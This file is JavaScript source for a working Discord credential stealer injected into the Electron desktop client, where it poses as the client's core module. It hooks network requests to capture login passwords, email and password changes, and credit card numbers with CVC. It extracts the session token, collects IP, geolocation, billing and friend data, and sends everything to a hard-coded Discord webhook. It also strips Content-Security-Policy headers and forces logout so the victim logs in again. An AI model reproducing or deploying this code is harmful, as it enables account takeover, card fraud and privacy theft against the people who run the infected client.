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{BrowserWindow,session} = require('electron');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os = require('os');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https = require('https');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querystring = require("querystring");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fs = require("fs");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config =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brand: "chavex7", // replace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webhook: "https://discord.com/api/webhooks/1307946895464861706/p9b9rY9cwwZbkBN6gqIUW_oX47L914vlw6HNRwFuYhFBMn_XpxYT8LQnKhKIVi7z6SE",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logout: true, // false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disable_qr_code: true,  // don't touch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notify_on_logout: true, // don't touch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notify_on_initialization: true, // don't touch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ping: [true, ""],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embed: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username: "Spidey Bot", // replace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footer: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text: `chavex7`, // replace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icon_url: "https://i.imgur.com/jbagJwj.jpeg", // replace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avatar_url: "https://i.imgur.com/jbagJwj.jpeg" // replace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badges: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Discord_Employee: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Value: 1,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Emoji: "&lt;:staff:874750808728666152&gt;",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Rare: true,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Partnered_Server_Owner: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Value: 2,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Emoji: "&lt;:partner:874750808678354964&gt;",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Rare: true,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HypeSquad_Events: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Value: 4,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Emoji: "&lt;:hypesquad_events:874750808594477056&gt;",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Rare: true,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Bug_Hunter_Level_1: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Value: 8,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Emoji: "&lt;:bughunter_1:874750808426692658&gt;",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Rare: true,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Early_Supporter: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Value: 512,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Emoji: "&lt;:early_supporter:874750808414113823&gt;",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Rare: true,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Bug_Hunter_Level_2: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Value: 16384,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Emoji: "&lt;:bughunter_2:874750808430874664&gt;",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Rare: true,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Early_Verified_Bot_Developer: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Value: 131072,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Emoji: "&lt;:developer:874750808472825986&gt;",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Rare: true,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House_Bravery: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Value: 64,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Emoji: "&lt;:bravery:874750808388952075&gt;",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Rare: false,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House_Brilliance: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Value: 128,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Emoji: "&lt;:brilliance:874750808338608199&gt;",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Rare: false,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House_Balance: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Value: 256,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Emoji: "&lt;:balance:874750808267292683&gt;",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Rare: false,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filters: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user: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urls: [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"https://discord.com/api/v*/users/@me",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"https://discordapp.com/api/v*/users/@me",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"https://*.discord.com/api/v*/users/@me",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"https://discordapp.com/api/v*/auth/login",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'https://discord.com/api/v*/auth/login',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'https://*.discord.com/api/v*/auth/login',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"https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts",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"https://api.stripe.com/v*/tokens",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"https://api.stripe.com/v*/setup_intents/*/confirm",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"https://api.stripe.com/v*/payment_intents/*/confirm",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qr_codes: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urls: [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"https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json",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"https://*.discord.com/api/v*/applications/detectable",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"https://discord.com/api/v*/applications/detectable",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"https://*.discord.com/api/v*/users/@me/library",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"https://discord.com/api/v*/users/@me/library",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"https://*.discord.com/api/v*/users/@me/billing/subscriptions",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"https://discord.com/api/v*/users/@me/billing/subscriptions",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"wss://remote-auth-gateway.discord.gg/*"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var execScript = (script) =&gt;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const window = BrowserWindow.getAllWindows()[0]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return window.webContents.executeJavaScript(script, true);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class Event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constructor(event, token, data)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for (let [key, value] of Object.entries({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"event": event,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"data": data,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"token": token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}))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this[key] = value;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handle()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switch (this["event"])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case "passwordChanged":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event_handlers["passwordChanged"](this.data.password, this.data.new_password, this.token)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case 'userLogin':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event_handlers["userLogin"](this.data.password, this.data.email, this.token)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case 'emailChanged':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event_handlers["emailChanged"](this.data.password, this.data.email, this.token)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case "creditCardAdded":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event_handlers["creditCardAdded"](this.data.number, this.data.cvc, this.data.exp_month, this.data.exp_year, this.token);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session.defaultSession.webRequest.onHeadersReceived((details, callback) =&gt;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if (details.url.startsWith(config.webhook))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if (details.url.includes("discord.com"))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callback({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responseHeaders: Object.assign({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'Access-Control-Allow-Headers': "*"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}, details.responseHeaders)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callback({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responseHeaders: Object.assign({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"Content-Security-Policy": ["default-src '*'", "Access-Control-Allow-Headers '*'", "Access-Control-Allow-Origin '*'"],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'Access-Control-Allow-Headers': "*",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"Access-Control-Allow-Origin": "*"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}, details.responseHeaders)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delete details.responseHeaders['content-security-policy'];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delete details.responseHeaders['content-security-policy-report-only'];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callback({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responseHeaders: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...details.responseHeaders,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'Access-Control-Allow-Headers': "*"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 catch {}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session.defaultSession.webRequest.onBeforeRequest(config.filters["qr_codes"], async (details, callback) =&gt;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if (details.url.startsWith("wss://"))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if (!config.disable_qr_code == false)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callback({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cancel: true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await initialize();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callback({})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session.defaultSession.webRequest.onCompleted(config.filters["user"], async (details, callback) =&gt;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if (details.statusCode == 200 || details.statusCode == 204)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const unparsed_data = Buffer.from(details.uploadData[0].bytes).toString();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const data = JSON.parse(unparsed_data)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const token = await getToken();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switch (true)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case details.url.endsWith('login'):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(new Event('userLogin', token,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    password: data.password,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    email: data.login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})).handle();;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case details.url.endsWith("tokens") &amp;&amp; details.method == "POST":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const item = querystring.parse(unparsed_data.toString());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(new Event('creditCardAdded', token,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    number: item["card[number]"],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    cvc: item["card[cvc]"],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    exp_month: item["card[exp_month]"],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    exp_year: item["card[exp_year]"],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}))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case details.url.endsWith('users/@me') &amp;&amp; details.method == 'PATCH':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if (!data.password) return;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if (data.email)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    (new Event('emailChanged', token,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        password: data.password,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        email: data.email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    })).handle();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};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if (data.new_password)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    (new Event('passwordChanged', token,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        password: data.password,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        new_password: data.new_password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    })).handle();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};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} catch {}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var event_handlers =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async creditCardAdded(number, cvc, month, year)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const userInfo = await getUserInfo(token);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const billing = await getBilling(token);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var params =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username: config.embed.username,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avatar_url: config.embed.avatar_url,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embeds: [createEmbed({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title: "CC Adde",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author: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name: `${userInfo.username}`,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fields: [{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    name: "CC Number",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    value: `\`\`\`${number}\`\`\``,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    inline: true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    name: "CVC",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    value: `\`\`\`${cvc}\`\`\``,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    inline: true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    name: "Expire",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    value: `\`\`\`${month}/${year}\`\`\``,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    inline: true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    name: "Billings",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    value: `${billing}`,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    inline: true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    name: "Token",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    value: `\`\`\`${token}\`\`\``,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    inline: false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}),]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sendToWebhook(params)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async userLogin(password, email, token)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const userInfo = await getUserInfo(token);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const billing = await getBilling(token);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const friends = await getRelationships(token);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var params =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username: config.embed.username,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avatar_url: config.embed.avatar_url,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embeds: [createEmbed({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title: "User Login",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author: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name: `${userInfo.username}`,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icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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thumbnail: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url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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fields: [{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    name: "Password",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    value: `\`\`\`${password}\`\`\``,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    inline: true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    name: "E-Mail",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    value: `\`\`\`${email}\`\`\``,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    inline: true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     name: "Phone",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    value: `\`\`\`${userInfo.phone ?? "None"}\`\`\``,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    inline: false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    name: "Nitro",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    value: `${getNitro(userInfo.premium_type)}`,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    inline: false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},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    name: "Billing",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    value: `${billing}`,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      inline: true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  },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    name: "Badges",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        value: `${getBadges(userInfo.flags)}`,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       inline: false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        name: "Token",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        value: `\`\`\`${token}\`\`\``,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        inline: false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    },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        name: "Hostname",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        value: `\`\`\`${os.hostname}\`\`\``,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       inline: false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}), createEmbed({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description: `**HQ Friends (${friends['length']})**\n\n${friends.frien}`,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thumbnail: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url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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author: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name: `${userInfo.username}`,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icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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})]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sendToWebhook(params)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async emailChanged(password, newEmail, token)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var userInfo = await getUserInfo(token);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var billing = await getBilling(token);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var friends = await getRelationships(token);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var params =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username: config.embed.username,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avatar_url: config.embed.avatar_url,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embeds: [createEmbed({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title: "E-Mail Changed",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author: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name: `${userInfo.username}`,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  icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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thumbnail: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url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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fields: [{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    name: "E-Mail",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      value: `\`\`\`${newEmail}\`\`\``,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    inline: true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    name: "Password",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    value: `\`\`\`${password}\`\`\``,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    inline: true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    name: "Phone",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    value: `\`\`\`${userInfo.phone ?? "None"}\`\`\``,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      inline: false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        name: "Nitro",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        value: `${getNitro(userInfo.premium_type)}`,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      inline: false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  },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        name: "Billing",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        value: `${billing}`,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        inline: true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    },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        name: "Badges",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        value: `${getBadges(userInfo.flags)}`,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        inline: false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      name: "Token",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    value: `\`\`\`${token}\`\`\``,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      inline: false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},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        name: "Hostname",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        value: `\`\`\`${os.hostname}\`\`\``,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        inline: false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}), createEmbed({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description: `**HQ Friends (${friends['length']})**\n\n${friends.frien}`,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thumbnail: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url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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author: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name: `${userInfo.username}`,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icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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})]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sendToWebhook(params)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async passwordChanged(oldPassword, newPassword, token)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var userInfo = await getUserInfo(token);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var billing = await getBilling(token);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var friends = await getRelationships(token);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var params =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username: config.embed.username,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avatar_url: config.embed.avatar_url,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embeds: [createEmbed({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title: "Password Changed",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author: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name: `${userInfo.username}`,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    icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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thumbnail: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  url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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fields: [{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        name: "Old Password",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        value: `\`\`\`${oldPassword}\`\`\``,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        inline: false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        name: "New Password",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        value: `\`\`\`${newPassword}\`\`\``,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        inline: false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    name: "Phone",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        value: `\`\`\`${userInfo.phone ?? "None"}\`\`\``,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        inline: false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        name: "Nitro",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        value: `${getNitro(userInfo.premium_type)}`,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        inline: false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    },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        name: "Billing",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      value: `${billing}`,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        inline: true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    },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        name: "Badges",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        value: `${getBadges(userInfo.flags)}`,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        inline: false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        name: "Token",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        value: `\`\`\`${token}\`\`\``,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        inline: false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  },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        name: "Hostname",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        value: `\`\`\`${os.hostname}\`\`\``,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        inline: false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}), createEmbed({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description: `**HQ Friends (${friends['length']})**\n\n${friends.frien}`,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thumbnail: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    url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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author: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  name: `${userInfo.username}`,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icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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})]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sendToWebhook(params)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function getDiscordClient() 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return `${process.cwd().replace(`${process.env.LOCALAPPDATA}\\`, '').split('\\')[0].split(7)}`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function getNitro(flags)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switch (flags) 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case 0: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return "\`\`\`No Nitro\`\`\`";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return "&lt;:classic:896119171019067423&gt; \`\`Nitro Classic\`\`";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return "&lt;a:boost:824036778570416129&gt; \`\`Nitro Boost\`\`";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return "\`\`\`No Nitro\`\`\`";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function getRareBadges(flags)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var b = '';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for (const prop in config.badges)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let o = config.badges[prop];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if ((flags &amp; o.Value) == o.Value &amp;&amp; o.Rare) b += o.Emoji;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return b;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function getBadges(flags) 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var b = '';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for (const prop in config.badges)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let o = config.badges[prop];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if ((flags &amp; o.Value) == o.Value) b += o.Emoji;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if (b == '') b = '\`\`\`No Badge\`\`\`'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return b;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async function getToken() {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return await execScript(`for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=&gt;a.exports=c},[['get_require']]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&amp;&amp;window.webpackChunkdiscord_app.push([[Math.random()],{},a=&gt;{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&amp;&amp;b.__esModule&amp;&amp;b.default)for(let a in b.default)'getToken'==a&amp;&amp;(token=b.default.getToken())}token;`, true)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async function getIp() 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return JSON.parse(await execScript(`var xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", "https://ipinfo.io/json", false );xmlHttp.send( null );xmlHttp.responseText;`, true));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async function getUserInfo(token)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return JSON.parse(await execScript(`var xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", "https://discord.com/api/v8/users/@me", false );xmlHttp.setRequestHeader("Authorization", "${token}");xmlHttp.send( null );xmlHttp.responseText;`, true));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async function getBilling(token) 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var a = await execScript(`var xmlHttp = new XMLHttpRequest(); xmlHttp.open( "GET", "https://discord.com/api/v9/users/@me/billing/payment-sources", false ); xmlHttp.setRequestHeader("Authorization", "${token}"); xmlHttp.send( null ); xmlHttp.responseText`, true)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var json = JSON.parse(a)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var billing = "";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json.forEach(z =&gt;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if (z.type == "") {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return "\`\`\`❌\`\`\`";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} else if (z.type == 2 &amp;&amp; z.invalid != true)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billing += "\`✔️\`" + " &lt;:paypal:896441236062347374&gt;";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} else if (z.type == 1 &amp;&amp; z.invalid != true) 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billing += "\`✔️\`" + " &lt;:bannerstory_creditcard:1108164687134203944&gt;";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return "\`\`\`❌\`\`\`";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(billing == "") billing = "\`\`\`❌\`\`\`"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return billing;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async function getRelationships(token)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var a = await execScript(`var xmlHttp = new XMLHttpRequest();xmlHttp.open( "GET", "https://discord.com/api/v9/users/@me/relationships", false );xmlHttp.setRequestHeader("Authorization", "${token}");xmlHttp.send( null );xmlHttp.responseText`, true)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var json = JSON.parse(a)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const r = json.filter((user) =&gt; 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return user.type == 1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var rareBadgesFriends = "";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for (z of r)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var b = getRareBadges(z.user.public_flags)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if (b != "") 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rareBadgesFriends += b + ` | ${z.user.username}#${z.user.discriminator}\n`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if (!rareBadgesFriends) rareBadgesFriends = "No HQ Friends"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length: r.length,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frien: rareBadgesFriends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function sendToWebhook(params) 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if (config.ping[0] == true)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if (params.content)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params.content = params.content + ` ||${config.ping[1]}||`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params.content = `||${config.ping[1]}||`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var url = new URL(config.webhook);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var headers = {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'Content-Type': 'application/json',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'Access-Control-Allow-Origin': '*',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const options = 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protocol: url.protocol,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hostname: url.host,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path: url.pathname,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method: 'POST',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headers: headers,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const req = https.request(options);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req.on('error', (err) =&gt; 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console.log(err);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req.write(JSON.stringify(params));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req.end();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function createEmbed(data)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let obj = {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"footer": config.embed.footer,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"timestamp": new Date(),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for (let [key, value] of Object.entries(data)) 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obj[key] = value;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return obj;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async function initialize() {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if (!fs.existsSync(`${process.cwd()}/${config.brand}`))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fs.mkdirSync(`${process.cwd()}/${config.brand}`)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var token = undefined;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token = await getToken();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const network_data = await getIp()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var userInfo;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var billing;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var friends;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if (config.notify_on_initialization) {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if (token == undefined) {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sendToWebhook({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    username: config.embed.username,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    avatar_url: config.embed.avatar_url,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      embeds: [createEmbed({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          title: "Discord started (session not started)",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          fields: [{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                name: "Hostname",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             value: `\`\`\`${os.hostname}\`\`\``,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              inline: false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        }, {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            name: "Discord Version",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            value: `\`\`\`${getDiscordClient()}\`\`\``,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              inline: false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          }, {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             name: "Connection data",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              value: `\`\`\`yaml\nIP: ${network_data['ip'] ?? "Unknown"}\nHostname: ${network_data['hostname'] ?? "Unknown"}\nCity: ${network_data['city'] ?? "Unknown"}\nRegion: ${network_data['region'] ?? "Unknown"}\nCountry: ${network_data["country"] ?? "Unknown"}\nTime Zone: ${network_data["timezone"] ?? "Unknown"}\`\`\``,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              inline: false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         }],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      })]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    userInfo = await getUserInfo(token);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  billing = await getBilling(token);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friends = await getRelationships(token);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  sendToWebhook({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        username: config.embed.username,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    avatar_url: config.embed.avatar_url,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    embeds: [createEmbed({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        title: "Discord Started",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        author: {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             name: `${userInfo.username}`,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              icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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            thumbnail: {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                url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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            fields: [{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                    name: "E-Mail",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                    value: `\`\`\`${userInfo.email}\`\`\``,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                  inline: true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                    name: "Phone",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                    value: `\`\`\`${userInfo.phone ?? "None"}\`\`\``,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                    inline: false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                    name: "Nitro",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                 value: `${getNitro(userInfo.premium_type)}`,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                  inline: false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             }, {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                  name: "Billing",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                    value: `${billing}`,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                    inline: true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                }, {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                    name: "Badges",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                    value: `${getBadges(userInfo.flags)}`,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                    inline: false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                    name: "Token",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                    value: `\`\`\`${token}\`\`\``,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                    inline: false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                    name: "Hostname",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                    value: `\`\`\`${os.hostname}\`\`\``,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                  inline: false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              }, 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                    name: "Client Version",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                    value: `\`\`\`${getDiscordClient()}\`\`\``,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                    inline: false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                }, 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                    name: "Connection data",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                  value: `\`\`\`yaml\nIP: ${network_data['ip'] ?? "Unknown"}\nHostname: ${network_data['hostname'] ?? "Unknown"}\nCity: ${network_data['city'] ?? "Unknown"}\nRegion: ${network_data['region'] ?? "Unknown"}\nCountry: ${network_data["country"] ?? "Unknown"}\nTime Zone: ${network_data["timezone"] ?? "Unknown"}\`\`\``,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                  inline: false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     }), createEmbed({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            description: `**HQ Friends (${friends['length']})**\n\n${friends.frien}`,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        thumbnail: {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               url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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          author: {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                name: `${userInfo.username}`,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                icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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      })]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if (config.logout &amp;&amp; token) {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await execScript(`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=&gt;a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&amp;&amp;window.webpackChunkdiscord_app.push([[Math.random()],{},a=&gt;{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&amp;&amp;d.__esModule&amp;&amp;d.default&amp;&amp;(b?d.default[b]:a(d.default)))return d.default;if(d&amp;&amp;(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`, true).then((result) =&gt; {});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if (config.notify_on_logout) {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    sendToWebhook({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        username: config.embed.username,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        avatar_url: config.embed.avatar_url,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        embeds: [createEmbed({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            title: "User Logged Out",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            author: {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            name: `${userInfo.username}`,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            icon_url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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        thumbnail: {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                url: userInfo.avatar ? `https://cdn.discordapp.com/avatars/${userInfo.id}/${userInfo.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"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            fields: [{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                    name: "Nitro",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                    value: `${getNitro(userInfo.premium_type)}`,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                    inline: false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                }, {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                    name: "Billing",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                    value: `${billing}`,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                    inline: true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                }, {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                    name: "Badges",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                    value: `${getBadges(userInfo.flags)}`,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                    inline: false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                    name: "Token",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                    value: `\`\`\`${token}\`\`\``,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                    inline: false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       })]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module.exports = require("./core.asar");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